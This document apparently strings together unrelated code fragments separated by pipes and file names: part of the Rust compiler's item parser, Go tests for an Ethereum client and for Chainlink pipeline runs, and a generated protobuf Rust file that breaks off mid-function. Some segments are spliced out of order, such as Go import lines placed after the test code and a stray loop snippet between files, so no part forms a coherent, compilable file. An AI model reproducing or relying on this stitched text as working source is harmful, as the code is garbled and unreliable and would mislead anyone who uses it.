const_span,
"you might want to declare a static instead",
"static".to_owned(),
Applicability::MaybeIncorrect,
);
err.emit();
}
let (ident, item_, extra_attrs) = self.parse_item_const(None)?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
// Parse `async unsafe? fn`.
if self.check_keyword(kw::Async) {
let async_span = self.span;
if self.is_keyword_ahead(1, &[kw::Fn])
|| self.is_keyword_ahead(2, &[kw::Fn])
{
// ASYNC FUNCTION ITEM
self.bump(); // `async`
let unsafety = self.parse_unsafety(); // `unsafe`?
self.expect_keyword(kw::Fn)?; // `fn`
let fn_span = self.prev_span;
let (ident, item_, extra_attrs) =
self.parse_item_fn(unsafety,
respan(async_span, IsAsync::Async {
closure_id: ast::DUMMY_NODE_ID,
return_impl_trait_id: ast::DUMMY_NODE_ID,
}),
respan(fn_span, Constness::NotConst),
Abi::Rust)?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
if self.span.rust_2015() {
self.diagnostic().struct_span_err_with_code(
async_span,
"`async fn` is not permitted in the 2015 edition",
DiagnosticId::Error("E0670".into())
).emit();
}
return Ok(Some(item));
}
}
if self.check_keyword(kw::Unsafe) &&
self.is_keyword_ahead(1, &[kw::Trait, kw::Auto])
{
// UNSAFE TRAIT ITEM
self.bump(); // `unsafe`
let is_auto = if self.eat_keyword(kw::Trait) {
IsAuto::No
} else {
self.expect_keyword(kw::Auto)?;
self.expect_keyword(kw::Trait)?;
IsAuto::Yes
};
let (ident, item_, extra_attrs) =
self.parse_item_trait(is_auto, Unsafety::Unsafe)?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if self.check_keyword(kw::Impl) ||
self.check_keyword(kw::Unsafe) &&
self.is_keyword_ahead(1, &[kw::Impl]) ||
self.check_keyword(kw::Default) &&
self.is_keyword_ahead(1, &[kw::Impl, kw::Unsafe]) {
// IMPL ITEM
let defaultness = self.parse_defaultness();
let unsafety = self.parse_unsafety();
self.expect_keyword(kw::Impl)?;
let (ident, item, extra_attrs) = self.parse_item_impl(unsafety, defaultness)?;
let span = lo.to(self.prev_span);
return Ok(Some(self.mk_item(span, ident, item, visibility,
maybe_append(attrs, extra_attrs))));
}
if self.check_keyword(kw::Fn) {
// FUNCTION ITEM
self.bump();
let fn_span = self.prev_span;
let (ident, item_, extra_attrs) =
self.parse_item_fn(Unsafety::Normal,
respan(fn_span, IsAsync::NotAsync),
respan(fn_span, Constness::NotConst),
Abi::Rust)?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if self.check_keyword(kw::Unsafe)
&& self.look_ahead(1, |t| *t != token::OpenDelim(token::Brace)) {
// UNSAFE FUNCTION ITEM
self.bump(); // `unsafe`
// `{` is also expected after `unsafe`, in case of error, include it in the diagnostic
self.check(&token::OpenDelim(token::Brace));
let abi = if self.eat_keyword(kw::Extern) {
self.parse_opt_abi()?.unwrap_or(Abi::C)
} else {
Abi::Rust
};
self.expect_keyword(kw::Fn)?;
let fn_span = self.prev_span;
let (ident, item_, extra_attrs) =
self.parse_item_fn(Unsafety::Unsafe,
respan(fn_span, IsAsync::NotAsync),
respan(fn_span, Constness::NotConst),
abi)?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if self.eat_keyword(kw::Mod) {
// MODULE ITEM
let (ident, item_, extra_attrs) =
self.parse_item_mod(&attrs[..])?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if let Some(type_) = self.eat_type() {
let (ident, alias, generics) = type_?;
// TYPE ITEM
let item_ = match alias {
AliasKind::Weak(ty) => ItemKind::Ty(ty, generics),
AliasKind::Existential(bounds) => ItemKind::Existential(bounds, generics),
};
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
attrs);
return Ok(Some(item));
}
if self.eat_keyword(kw::Enum) {
// ENUM ITEM
let (ident, item_, extra_attrs) = self.parse_item_enum()?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if self.check_keyword(kw::Trait)
|| (self.check_keyword(kw::Auto)
&& self.is_keyword_ahead(1, &[kw::Trait]))
{
let is_auto = if self.eat_keyword(kw::Trait) {
IsAuto::No
} else {
self.expect_keyword(kw::Auto)?;
self.expect_keyword(kw::Trait)?;
IsAuto::Yes
};
// TRAIT ITEM
let (ident, item_, extra_attrs) =
self.parse_item_trait(is_auto, Unsafety::Normal)?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if self.eat_keyword(kw::Struct) {
// STRUCT ITEM
let (ident, item_, extra_attrs) = self.parse_item_struct()?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if self.is_union_item() {
// UNION ITEM
self.bump();
let (ident, item_, extra_attrs) = self.parse_item_union()?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if let Some(macro_def) = self.eat_macro_def(&attrs, &visibility, lo)? {
return Ok(Some(macro_def));
}
// Verify whether we have encountered a struct or method definition where the user forgot to
// add the `struct` or `fn` keyword after writing `pub`: `pub S {}`
if visibility.node.is_pub() &&
self.check_ident() &&
self.look_ahead(1, |t| *t != token::Not)
{
// Space between `pub` keyword and the identifier
//
// pub S {}
// ^^^ `sp` points here
let sp = self.prev_span.between(self.span);
let full_sp = self.prev_span.to(self.span);
let ident_sp = self.span;
if self.look_ahead(1, |t| *t == token::OpenDelim(token::Brace)) {
// possible public struct definition where `struct` was forgotten
let ident = self.parse_ident().unwrap();
let msg = format!("add `struct` here to parse `{}` as a public struct",
ident);
let mut err = self.diagnostic()
.struct_span_err(sp, "missing `struct` for struct definition");
err.span_suggestion_short(
sp, &msg, " struct ".into(), Applicability::MaybeIncorrect // speculative
);
return Err(err);
} else if self.look_ahead(1, |t| *t == token::OpenDelim(token::Paren)) {
let ident = self.parse_ident().unwrap();
self.bump(); // `(`
let kw_name = if let Ok(Some(_)) = self.parse_self_arg() {
"method"
} else {
"function"
};
self.consume_block(token::Paren);
let (kw, kw_name, ambiguous) = if self.check(&token::RArrow) {
self.eat_to_tokens(&[&token::OpenDelim(token::Brace)]);
self.bump(); // `{`
("fn", kw_name, false)
} else if self.check(&token::OpenDelim(token::Brace)) {
self.bump(); // `{`
("fn", kw_name, false)
} else if self.check(&token::Colon) {
let kw = "struct";
(kw, kw, false)
} else {
("fn` or `struct", "function or struct", true)
};
let msg = format!("missing `{}` for {} definition", kw, kw_name);
let mut err = self.diagnostic().struct_span_err(sp, &msg);
if !ambiguous {
self.consume_block(token::Brace);
let suggestion = format!("add `{}` here to parse `{}` as a public {}",
kw,
ident,
kw_name);
err.span_suggestion_short(
sp, &suggestion, format!(" {} ", kw), Applicability::MachineApplicable
);
} else {
if let Ok(snippet) = self.sess.source_map().span_to_snippet(ident_sp) {
err.span_suggestion(
full_sp,
"if you meant to call a macro, try",
format!("{}!", snippet),
// this is the `ambiguous` conditional branch
Applicability::MaybeIncorrect
);
} else {
err.help("if you meant to call a macro, remove the `pub` \
and add a trailing `!` after the identifier");
}
}
return Err(err);
} else if self.look_ahead(1, |t| *t == token::Lt) {
let ident = self.parse_ident().unwrap();
self.eat_to_tokens(&[&token::Gt]);
self.bump(); // `>`
let (kw, kw_name, ambiguous) = if self.eat(&token::OpenDelim(token::Paren)) {
if let Ok(Some(_)) = self.parse_self_arg() {
("fn", "method", false)
} else {
("fn", "function", false)
}
} else if self.check(&token::OpenDelim(token::Brace)) {
("struct", "struct", false)
} else {
("fn` or `struct", "function or struct", true)
};
let msg = format!("missing `{}` for {} definition", kw, kw_name);
let mut err = self.diagnostic().struct_span_err(sp, &msg);
if !ambiguous {
err.span_suggestion_short(
sp,
&format!("add `{}` here to parse `{}` as a public {}", kw, ident, kw_name),
format!(" {} ", kw),
Applicability::MachineApplicable,
);
}
return Err(err);
}
}
self.parse_macro_use_or_failure(attrs, macros_allowed, attributes_allowed, lo, visibility)
}
/// Parses a foreign item.
crate fn parse_foreign_item(&mut self) -> PResult<'a, ForeignItem> {
maybe_whole!(self, NtForeignItem, |ni| ni);
let attrs = self.parse_outer_attributes()?;
let lo = self.span;
let visibility = self.parse_visibility(false)?;
// FOREIGN STATIC ITEM
// Treat `const` as `static` for error recovery, but don't add it to expected tokens.
if self.check_keyword(kw::Static) || self.token.is_keyword(kw::Const) {
if self.token.is_keyword(kw::Const) {
self.diagnostic()
.struct_span_err(self.span, "extern items cannot be `const`")
.span_suggestion(
self.span,
"try using a static value",
"static".to_owned(),
Applicability::MachineApplicable
).emit();
}
self.bump(); // `static` or `const`
return Ok(self.parse_item_foreign_static(visibility, lo, attrs)?);
}
// FOREIGN FUNCTION ITEM
if self.check_keyword(kw::Fn) {
return Ok(self.parse_item_foreign_fn(visibility, lo, attrs)?);
}
// FOREIGN TYPE ITEM
if self.check_keyword(kw::Type) {
return Ok(self.parse_item_foreign_type(visibility, lo, attrs)?);
}
match self.parse_assoc_macro_invoc("extern", Some(&visibility), &mut false)? {
Some(mac) => {
Ok(
ForeignItem {
ident: Ident::invalid(),
span: lo.to(self.prev_span),
id: ast::DUMMY_NODE_ID,
attrs,
vis: visibility,
node: ForeignItemKind::Macro(mac),
}
)
}
None => {
if !attrs.is_empty() {
self.expected_item_err(&attrs)?;
}
self.unexpected()
}
}
}
/// This is the fall-through for parsing items.
fn parse_macro_use_or_failure(
&mut self,
attrs: Vec<Attribute> ,
macros_allowed: bool,
attributes_allowed: bool,
lo: Span,
visibility: Visibility
) -> PResult<'a, Option<P<Item>>> {
if macros_allowed && self.token.is_path_start() &&
!(self.is_async_fn() && self.span.rust_2015()) {
// MACRO INVOCATION ITEM
let prev_span = self.prev_span;
self.complain_if_pub_macro(&visibility.node, prev_span);
let mac_lo = self.span;
// item macro.
let pth = self.parse_path(PathStyle::Mod)?;
self.expect(&token::Not)?;
// a 'special' identifier (like what `macro_rules!` uses)
// is optional. We should eventually unify invoc syntax
// and remove this.
let id = if self.token.is_ident() {
self.parse_ident()?
} else {
Ident::invalid() // no special identifier
};
// eat a matched-delimiter token tree:
let (delim, tts) = self.expect_delimited_token_tree()?;
if delim != MacDelimiter::Brace && !self.eat(&token::Semi) {
self.report_invalid_macro_expansion_item();
}
let hi = self.prev_span;
let mac = respan(mac_lo.to(hi), Mac_ { path: pth, tts, delim });
let item = self.mk_item(lo.to(hi), id, ItemKind::Mac(mac), visibility, attrs);
return Ok(Some(item));
}
// FAILURE TO PARSE ITEM
match visibility.node {
VisibilityKind::Inherited => {}
_ => {
return Err(self.span_fatal(self.prev_span, "unmatched visibility `pub`"));
}
}
if !attributes_allowed && !attrs.is_empty() {
self.expected_item_err(&attrs)?;
}
Ok(None)
}
/// Parses a macro invocation inside a `trait`, `impl` or `extern` block.
fn parse_assoc_macro_invoc(&mut self, item_kind: &str, vis: Option<&Visibility>,
at_end: &mut bool) -> PResult<'a, Option<Mac>>
{
if self.token.is_path_start() &&
!(self.is_async_fn() && self.span.rust_2015()) {
let prev_span = self.prev_span;
let lo = self.span;
let pth = self.parse_path(PathStyle::Mod)?;
if pth.segments.len() == 1 {
if !self.eat(&token::Not) {
return Err(self.missing_assoc_item_kind_err(item_kind, prev_span));
}
} else {
self.expect(&token::Not)?;
}
if let Some(vis) = vis {
self.complain_if_pub_macro(&vis.node, prev_span);
}
*at_end = true;
// eat a matched-delimiter token tree:
let (delim, tts) = self.expect_delimited_token_tree()?;
if delim != MacDelimiter::Brace {
self.expect(&token::Semi)?;
}
Ok(Some(respan(lo.to(self.prev_span), Mac_ { path: pth, tts, delim })))
} else {
Ok(None)
}
}
fn collect_tokens<F, R>(&mut self, f: F) -> PResult<'a, (R, TokenStream)>
where F: FnOnce(&mut Self) -> PResult<'a, R>
{
// Record all tokens we parse when parsing this item.
let mut tokens = Vec::new();
let prev_collecting = match self.token_cursor.frame.last_token {
LastToken::Collecting(ref mut list) => {
Some(mem::replace(list, Vec::new()))
}
LastToken::Was(ref mut last) => {
tokens.extend(last.take());
None
}
};
self.token_cursor.frame.last_token = LastToken::Collecting(tokens);
let prev = self.token_cursor.stack.len();
let ret = f(self);
let last_token = if self.token_cursor.stack.len() == prev {
&mut self.token_cursor.frame.last_token
} else {
&mut self.token_cursor.stack[prev].last_token
};
// Pull out the tokens that we've collected from the call to `f` above.
let mut collected_tokens = match *last_token {
LastToken::Collecting(ref mut v) => mem::replace(v, Vec::new()),
LastToken::Was(_) => panic!("our vector went away?"),
};
// If we're not at EOF our current token wasn't actually consumed by
// `f`, but it'll still be in our list that we pulled out. In that case
// put it back.
let extra_token = if self.token != token::Eof {
collected_tokens.pop()
} else {
None
};
// If we were previously collecting tokens, then this was a recursive
// call. In that case we need to record all the tokens we collected in
// our parent list as well. To do that we push a clone of our stream
// onto the previous list.
match prev_collecting {
Some(mut list) => {
list.extend(collected_tokens.iter().cloned());
list.extend(extra_token);
*last_token = LastToken::Collecting(list);
}
None => {
*last_token = LastToken::Was(extra_token);
}
}
Ok((ret?, TokenStream::new(collected_tokens)))
}
pub fn parse_item(&mut self) -> PResult<'a, Option<P<Item>>> {
let attrs = self.parse_outer_attributes()?;
self.parse_item_(attrs, true, false)
}
/// `::{` or `::*`
fn is_import_coupler(&mut self) -> bool {
self.check(&token::ModSep) &&
self.look_ahead(1, |t| *t == token::OpenDelim(token::Brace) ||
*t == token::BinOp(token::Star))
}
/// Parses a `UseTree`.
///
/// ```
/// USE_TREE = [`::`] `*` |
/// [`::`] `{` USE_TREE_LIST `}` |
/// PATH `::` `*` |
/// PATH `::` `{` USE_TREE_LIST `}` |
/// PATH [`as` IDENT]
/// ```
fn parse_use_tree(&mut self) -> PResult<'a, UseTree> {
let lo = self.span;
let mut prefix = ast::Path { segments: Vec::new(), span: lo.shrink_to_lo() };
let kind = if self.check(&token::OpenDelim(token::Brace)) ||
self.check(&token::BinOp(token::Star)) ||
self.is_import_coupler() {
// `use *;` or `use ::*;` or `use {...};` or `use ::{...};`
let mod_sep_ctxt = self.span.ctxt();
if self.eat(&token::ModSep) {
prefix.segments.push(
PathSegment::path_root(lo.shrink_to_lo().with_ctxt(mod_sep_ctxt))
);
}
if self.eat(&token::BinOp(token::Star)) {
UseTreeKind::Glob
} else {
UseTreeKind::Nested(self.parse_use_tree_list()?)
}
} else {
// `use path::*;` or `use path::{...};` or `use path;` or `use path as bar;`
prefix = self.parse_path(PathStyle::Mod)?;
if self.eat(&token::ModSep) {
if self.eat(&token::BinOp(token::Star)) {
UseTreeKind::Glob
} else {
UseTreeKind::Nested(self.parse_use_tree_list()?)
}
} else {
UseTreeKind::Simple(self.parse_rename()?, ast::DUMMY_NODE_ID, ast::DUMMY_NODE_ID)
}
};
Ok(UseTree { prefix, kind, span: lo.to(self.prev_span) })
}
/// Parses a `UseTreeKind::Nested(list)`.
///
/// ```
/// USE_TREE_LIST = Ø | (USE_TREE `,`)* USE_TREE [`,`]
/// ```
fn parse_use_tree_list(&mut self) -> PResult<'a, Vec<(UseTree, ast::NodeId)>> {
self.parse_unspanned_seq(&token::OpenDelim(token::Brace),
&token::CloseDelim(token::Brace),
SeqSep::trailing_allowed(token::Comma), |this| {
Ok((this.parse_use_tree()?, ast::DUMMY_NODE_ID))
})
}
fn parse_rename(&mut self) -> PResult<'a, Option<Ident>> {
if self.eat_keyword(kw::As) {
self.parse_ident_or_underscore().map(Some)
} else {
Ok(None)
}
}
/// Parses a source module as a crate. This is the main entry point for the parser.
pub fn parse_crate_mod(&mut self) -> PResult<'a, Crate> {
let lo = self.span;
let krate = Ok(ast::Crate {
attrs: self.parse_inner_attributes()?,
module: self.parse_mod_items(&token::Eof, lo)?,
span: lo.to(self.span),
});
krate
}
pub fn parse_optional_str(&mut self) -> Option<(Symbol, ast::StrStyle, Option<ast::Name>)> {
let ret = match self.token {
token::Literal(token::Lit { kind: token::Str, symbol, suffix }) =>
(symbol, ast::StrStyle::Cooked, suffix),
token::Literal(token::Lit { kind: token::StrRaw(n), symbol, suffix }) =>
(symbol, ast::StrStyle::Raw(n), suffix),
_ => return None
};
self.bump();
Some(ret)
}
pub fn parse_str(&mut self) -> PResult<'a, (Symbol, StrStyle)> {
match self.parse_optional_str() {
Some((s, style, suf)) => {
let sp = self.prev_span;
self.expect_no_suffix(sp, "a string literal", suf);
Ok((s, style))
}
_ => {
let msg = "expected string literal";
let mut err = self.fatal(msg);
err.span_label(self.span, msg);
Err(err)
}
}
}
fn report_invalid_macro_expansion_item(&self) {
self.struct_span_err(
self.prev_span,
"macros that expand to items must be delimited with braces or followed by a semicolon",
).multipart_suggestion(
"change the delimiters to curly braces",
vec![
(self.prev_span.with_hi(self.prev_span.lo() + BytePos(1)), String::from(" {")),
(self.prev_span.with_lo(self.prev_span.hi() - BytePos(1)), '}'.to_string()),
],
Applicability::MaybeIncorrect,
).span_suggestion(
self.sess.source_map.next_point(self.prev_span),
"add a semicolon",
';'.to_string(),
Applicability::MaybeIncorrect,
).emit();
}
}
pub fn emit_unclosed_delims(unclosed_delims: &mut Vec<UnmatchedBrace>, handler: &errors::Handler) {
for unmatched in unclosed_delims.iter() {
let mut err = handler.struct_span_err(unmatched.found_span, &format!(
"incorrect close delimiter: `{}`",
pprust::token_to_string(&token::Token::CloseDelim(unmatched.found_delim)),
));
err.span_label(unmatched.found_span, "incorrect close delimiter");
if let Some(sp) = unmatched.candidate_span {
err.span_label(sp, "close delimiter possibly meant for this");
}
if let Some(sp) = unmatched.unclosed_span {
err.span_label(sp, "un-closed delimiter");
}
err.emit();
}
unclosed_delims.clear();
} | while !kets.iter().any(|k| {
match expect {
TokenExpectType::Expect => self.check(k), |
targetaggregatorspercommittee_test.go | // Copyright © 2020 Attestant Limited.
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0 | // Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package prysmgrpc_test
import (
"context"
"os"
"testing"
"github.com/attestantio/go-eth2-client/prysmgrpc"
"github.com/stretchr/testify/require"
)
func TestTargetAggregatorsPerCommittee(t *testing.T) {
tests := []struct {
name string
}{
{
name: "Good",
},
}
service, err := prysmgrpc.New(context.Background(),
prysmgrpc.WithAddress(os.Getenv("PRYSMGRPC_ADDRESS")),
prysmgrpc.WithTimeout(timeout),
)
require.NoError(t, err)
for _, test := range tests {
t.Run(test.name, func(t *testing.T) {
targetAggregatorsPerCommittee, err := service.TargetAggregatorsPerCommittee(context.Background())
require.NoError(t, err)
require.NotNil(t, targetAggregatorsPerCommittee)
})
}
} | // |
pipeline_runs_controller_test.go | package web_test
import (
"context"
"fmt"
"net/http"
"testing"
|
"github.com/pelletier/go-toml"
"github.com/smartcontractkit/chainlink/core/internal/cltest"
"github.com/smartcontractkit/chainlink/core/services/pipeline"
"github.com/smartcontractkit/chainlink/core/web"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"gopkg.in/guregu/null.v4"
)
func TestPipelineRunsController_Create_HappyPath(t *testing.T) {
t.Parallel()
rpcClient, gethClient, _, assertMocksCalled := cltest.NewEthMocksWithStartupAssertions(t)
defer assertMocksCalled()
app, cleanup := cltest.NewApplication(t,
eth.NewClientWith(rpcClient, gethClient),
)
defer cleanup()
require.NoError(t, app.Start())
key := cltest.MustInsertRandomKey(t, app.Store.DB)
_, bridge := cltest.NewBridgeType(t, "voter_turnout", "blah")
require.NoError(t, app.Store.DB.Create(bridge).Error)
_, bridge2 := cltest.NewBridgeType(t, "election_winner", "blah")
require.NoError(t, app.Store.DB.Create(bridge2).Error)
client := app.NewHTTPClient()
var ocrJobSpecFromFile job.SpecDB
tree, err := toml.LoadFile("testdata/oracle-spec.toml")
require.NoError(t, err)
err = tree.Unmarshal(&ocrJobSpecFromFile)
require.NoError(t, err)
var ocrSpec job.OffchainReportingOracleSpec
err = tree.Unmarshal(&ocrSpec)
require.NoError(t, err)
ocrJobSpecFromFile.OffchainreportingOracleSpec = &ocrSpec
ocrJobSpecFromFile.OffchainreportingOracleSpec.TransmitterAddress = &key.Address
jobID, _ := app.AddJobV2(context.Background(), ocrJobSpecFromFile, null.String{})
response, cleanup := client.Post("/v2/jobs/"+fmt.Sprintf("%v", jobID)+"/runs", nil)
defer cleanup()
cltest.AssertServerResponse(t, response, http.StatusOK)
parsedResponse := job.PipelineRun{}
err = web.ParseJSONAPIResponse(cltest.ParseResponseBody(t, response), &parsedResponse)
assert.NoError(t, err)
assert.NotNil(t, parsedResponse.ID)
}
func TestPipelineRunsController_Index_HappyPath(t *testing.T) {
client, jobID, runIDs, cleanup := setupPipelineRunsControllerTests(t)
defer cleanup()
response, cleanup := client.Get("/v2/jobs/" + fmt.Sprintf("%v", jobID) + "/runs")
defer cleanup()
cltest.AssertServerResponse(t, response, http.StatusOK)
var parsedResponse []pipeline.Run
responseBytes := cltest.ParseResponseBody(t, response)
assert.Contains(t, string(responseBytes), `"meta":null,"errors":[null],"outputs":["3"]`)
err := web.ParseJSONAPIResponse(responseBytes, &parsedResponse)
assert.NoError(t, err)
require.Len(t, parsedResponse, 2)
assert.Equal(t, parsedResponse[1].ID, runIDs[0])
assert.NotNil(t, parsedResponse[1].CreatedAt)
assert.NotNil(t, parsedResponse[1].FinishedAt)
require.Len(t, parsedResponse[1].PipelineTaskRuns, 4)
}
func TestPipelineRunsController_Index_Pagination(t *testing.T) {
client, jobID, runIDs, cleanup := setupPipelineRunsControllerTests(t)
defer cleanup()
response, cleanup := client.Get("/v2/jobs/" + fmt.Sprintf("%v", jobID) + "/runs?page=1&size=1")
defer cleanup()
cltest.AssertServerResponse(t, response, http.StatusOK)
var parsedResponse []pipeline.Run
responseBytes := cltest.ParseResponseBody(t, response)
assert.Contains(t, string(responseBytes), `"meta":null,"errors":[null],"outputs":["3"]`)
assert.Contains(t, string(responseBytes), `"meta":{"count":2}`)
err := web.ParseJSONAPIResponse(responseBytes, &parsedResponse)
assert.NoError(t, err)
require.Len(t, parsedResponse, 1)
assert.Equal(t, parsedResponse[0].ID, runIDs[1])
assert.NotNil(t, parsedResponse[0].CreatedAt)
assert.NotNil(t, parsedResponse[0].FinishedAt)
require.Len(t, parsedResponse[0].PipelineTaskRuns, 4)
}
func TestPipelineRunsController_Show_HappyPath(t *testing.T) {
client, jobID, runIDs, cleanup := setupPipelineRunsControllerTests(t)
defer cleanup()
response, cleanup := client.Get("/v2/jobs/" + fmt.Sprintf("%v", jobID) + "/runs/" + fmt.Sprintf("%v", runIDs[0]))
defer cleanup()
cltest.AssertServerResponse(t, response, http.StatusOK)
var parsedResponse pipeline.Run
responseBytes := cltest.ParseResponseBody(t, response)
assert.Contains(t, string(responseBytes), `"meta":null,"errors":[null],"outputs":["3"]`)
err := web.ParseJSONAPIResponse(responseBytes, &parsedResponse)
assert.NoError(t, err)
assert.Equal(t, parsedResponse.ID, runIDs[0])
assert.NotNil(t, parsedResponse.CreatedAt)
assert.NotNil(t, parsedResponse.FinishedAt)
require.Len(t, parsedResponse.PipelineTaskRuns, 4)
}
func TestPipelineRunsController_ShowRun_InvalidID(t *testing.T) {
t.Parallel()
rpcClient, gethClient, _, assertMocksCalled := cltest.NewEthMocksWithStartupAssertions(t)
defer assertMocksCalled()
app, cleanup := cltest.NewApplication(t,
eth.NewClientWith(rpcClient, gethClient),
)
defer cleanup()
require.NoError(t, app.Start())
client := app.NewHTTPClient()
response, cleanup := client.Get("/v2/jobs/1/runs/invalid-run-ID")
defer cleanup()
cltest.AssertServerResponse(t, response, http.StatusUnprocessableEntity)
}
func setupPipelineRunsControllerTests(t *testing.T) (cltest.HTTPClientCleaner, int32, []int64, func()) {
t.Parallel()
rpcClient, gethClient, _, assertMocksCalled := cltest.NewEthMocksWithStartupAssertions(t)
defer assertMocksCalled()
app, cleanup := cltest.NewApplication(t,
eth.NewClientWith(rpcClient, gethClient),
)
require.NoError(t, app.Start())
client := app.NewHTTPClient()
mockHTTP, cleanupHTTP := cltest.NewHTTPMockServer(t, http.StatusOK, "GET", `{"USD": 1}`)
key := cltest.MustInsertRandomKey(t, app.Store.DB)
sp := fmt.Sprintf(`
type = "offchainreporting"
schemaVersion = 1
contractAddress = "%s"
p2pPeerID = "%s"
p2pBootstrapPeers = [
"/dns4/chain.link/tcp/1234/p2p/16Uiu2HAm58SP7UL8zsnpeuwHfytLocaqgnyaYKP8wu7qRdrixLju",
]
keyBundleID = "%s"
transmitterAddress = "%s"
observationSource = """
// data source 1
ds [type=http method=GET url="%s"];
ds_parse [type=jsonparse path="USD"];
ds_multiply [type=multiply times=3];
ds -> ds_parse -> ds_multiply -> answer;
answer [type=median index=0];
"""
`, cltest.NewAddress().Hex(), cltest.DefaultP2PPeerID, cltest.DefaultOCRKeyBundleID, key.Address.Hex(), mockHTTP.URL)
var ocrJobSpec job.SpecDB
err := toml.Unmarshal([]byte(sp), &ocrJobSpec)
require.NoError(t, err)
var os job.OffchainReportingOracleSpec
err = toml.Unmarshal([]byte(sp), &os)
require.NoError(t, err)
ocrJobSpec.OffchainreportingOracleSpec = &os
err = app.Store.OCRKeyStore.Unlock(cltest.Password)
require.NoError(t, err)
jobID, err := app.AddJobV2(context.Background(), ocrJobSpec, null.String{})
require.NoError(t, err)
firstRunID, err := app.RunJobV2(context.Background(), jobID, nil)
require.NoError(t, err)
secondRunID, err := app.RunJobV2(context.Background(), jobID, nil)
require.NoError(t, err)
err = app.AwaitRun(context.Background(), firstRunID)
require.NoError(t, err)
err = app.AwaitRun(context.Background(), secondRunID)
require.NoError(t, err)
return client, jobID, []int64{firstRunID, secondRunID}, func() {
cleanup()
cleanupHTTP()
}
} | "github.com/smartcontractkit/chainlink/core/services/eth"
"github.com/smartcontractkit/chainlink/core/services/job" |
plugin.rs | // This file is generated by rust-protobuf 3.0.0-pre. Do not edit
// .proto file is parsed by protoc --rust-out=...
// @generated
// https://github.com/rust-lang/rust-clippy/issues/702
#![allow(unknown_lints)]
#![allow(clippy::all)]
#![allow(unused_attributes)]
#![rustfmt::skip]
#![allow(box_pointers)]
#![allow(dead_code)]
#![allow(missing_docs)]
#![allow(non_camel_case_types)]
#![allow(non_snake_case)]
#![allow(non_upper_case_globals)]
#![allow(trivial_casts)]
#![allow(unused_results)]
#![allow(unused_mut)]
//! Generated file from `google/protobuf/compiler/plugin.proto`
/// The version number of protocol compiler.
#[derive(PartialEq,Clone,Default)]
#[cfg_attr(serde, derive(::serde::Serialize, ::serde::Deserialize))]
pub struct Version {
// message fields
major: ::std::option::Option<i32>,
minor: ::std::option::Option<i32>,
patch: ::std::option::Option<i32>,
/// A suffix for alpha, beta or rc release, e.g., "alpha-1", "rc2". It should
/// be empty for mainline stable releases.
suffix: ::std::option::Option<::std::string::String>,
// special fields
#[cfg_attr(serde, serde(skip))]
pub unknown_fields: crate::UnknownFields,
#[cfg_attr(serde, serde(skip))]
pub cached_size: crate::rt::CachedSize,
}
impl<'a> ::std::default::Default for &'a Version {
fn default() -> &'a Version {
<Version as crate::Message>::default_instance()
}
}
impl Version {
pub fn new() -> Version {
::std::default::Default::default()
}
// optional int32 major = 1;
pub fn get_major(&self) -> i32 {
self.major.unwrap_or(0)
}
pub fn clear_major(&mut self) {
self.major = ::std::option::Option::None;
}
pub fn has_major(&self) -> bool {
self.major.is_some()
}
// Param is passed by value, moved
pub fn set_major(&mut self, v: i32) {
self.major = ::std::option::Option::Some(v);
}
// optional int32 minor = 2;
pub fn get_minor(&self) -> i32 {
self.minor.unwrap_or(0)
}
pub fn clear_minor(&mut self) {
self.minor = ::std::option::Option::None;
}
pub fn has_minor(&self) -> bool {
self.minor.is_some()
}
// Param is passed by value, moved
pub fn set_minor(&mut self, v: i32) {
self.minor = ::std::option::Option::Some(v);
}
// optional int32 patch = 3;
pub fn get_patch(&self) -> i32 {
self.patch.unwrap_or(0)
}
pub fn clear_patch(&mut self) {
self.patch = ::std::option::Option::None;
}
pub fn has_patch(&self) -> bool {
self.patch.is_some()
}
// Param is passed by value, moved
pub fn set_patch(&mut self, v: i32) {
self.patch = ::std::option::Option::Some(v);
}
// optional string suffix = 4;
pub fn get_suffix(&self) -> &str {
match self.suffix.as_ref() {
Some(v) => v,
None => "",
}
}
pub fn clear_suffix(&mut self) {
self.suffix = ::std::option::Option::None;
}
pub fn has_suffix(&self) -> bool {
self.suffix.is_some()
}
// Param is passed by value, moved
pub fn set_suffix(&mut self, v: ::std::string::String) {
self.suffix = ::std::option::Option::Some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_suffix(&mut self) -> &mut ::std::string::String {
if self.suffix.is_none() {
self.suffix = ::std::option::Option::Some(::std::string::String::new());
}
self.suffix.as_mut().unwrap()
}
// Take field
pub fn take_suffix(&mut self) -> ::std::string::String {
self.suffix.take().unwrap_or_else(|| ::std::string::String::new())
